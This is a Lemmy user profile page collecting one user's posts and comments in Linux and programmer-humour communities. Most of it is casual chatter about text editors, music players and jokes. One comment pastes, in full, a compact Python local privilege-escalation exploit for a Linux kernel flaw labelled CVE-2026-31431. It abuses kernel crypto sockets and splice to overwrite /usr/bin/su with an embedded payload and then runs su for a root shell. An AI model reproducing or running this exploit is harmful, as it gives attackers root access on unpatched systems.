not_IO
really cute; dms open!
- 36 Posts
- 16 Comments
not_IO@lemmy.blahaj.zoneOPto
Linux@programming.dev•The same 732-byte Python script roots every Linux distribution shipped since 2017English
27·3 months agographeneOS has already vented on social media that theu are not affected because of how they configured SELinux and that the headline is therefore not correct
not_IO@lemmy.blahaj.zoneOPto
Linux@programming.dev•The same 732-byte Python script roots every Linux distribution shipped since 2017English
532·3 months agohere is just the code https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
#!/usr/bin/env python3 import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0 f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) while i<len(e):c(f,i,e[i:i+4]);i+=4 g.system("su")
not_IO@lemmy.blahaj.zoneOPto
Programmer Humor@programming.dev•tech never works for longEnglish
1·3 months agowhen was the last update :p
juniors are 45 these days
not_IO@lemmy.blahaj.zoneOPto
Programmer Humor@programming.dev•holy shit holy shit holy shit holyEnglish
22·4 months agono way xD
not_IO@lemmy.blahaj.zoneOPto
Linux@programming.dev•The state of Linux music players in 2026English
3·4 months agothat would be great! i miss visualizers in music players!
Die Hard Cosplay
enhsitificator looking kinda 🫣
vim is for people who want to see the file they are editing
outstanding
here is a nice little video about ed that made me want to try it, it’s a very good creator in general https://www.youtube.com/watch?v=GoyNMFccbow
depends,
do you want to edit the textfile, or nanodit it?
not_IO@lemmy.blahaj.zoneOPto
Programmer Humor@programming.dev•clob is opensource this is the futureEnglish
25·6 months agohttps://brain.worm.pink/users/clod
i think this might be it’s profile





https://xint.io/blog/copy-fail-linux-distributions
according to this (good) blog post the disclosure to the linux kernel security team was already like a month ago so i would imagine the fix is already on a lot of systems